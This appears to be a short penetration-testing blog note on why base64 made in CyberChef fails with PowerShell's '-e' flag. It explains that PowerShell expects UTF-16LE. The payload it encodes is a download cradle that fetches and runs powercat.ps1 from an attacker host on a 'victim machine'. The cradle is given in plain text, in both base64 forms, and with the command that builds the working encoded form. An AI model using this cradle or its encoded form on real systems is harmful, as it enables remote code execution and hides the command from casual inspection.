init

In one case I have discovered some strange issue which I have never faced before. I was trying execute a powershell command as shown below:

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1')

How ever interestingly, if I use CyberChef to encode the above command to base64 so that I can use powershell -e to decode the code and then execute on the victim machine.

If the encoding is done on the CyberChef, we get the below:

SUVYKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC41Ni4yNTQ6ODAwMC9wb3dlcmNhdC5wczEnKQ==

However, if we try to execute the command on the a trial machine we see that below: Clearly the command is not being able to execute.

encode using powershell

After some debugging I found that there is a significant difference between the base64 encoding done by the PowerShell and CyberChef. If we execute the below:

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.56.254:8000/powercat.ps1')"))

Output in the PowerShell we get is below:

SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADIANQA0ADoAOAAwADAAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA=

As we can see that there is a significant change between these two base64 encoded strings. If we try to decode the above base64 encoded string into CyberChef we get some strange looking characters.

solve

The difference is because of the encoding difference between PowerShell and CyberChef one is UTF-8 and another is in Unicode which is causing the problem. Use the UTF-16-LE (1200) and then use the ToBase64 to encode properly.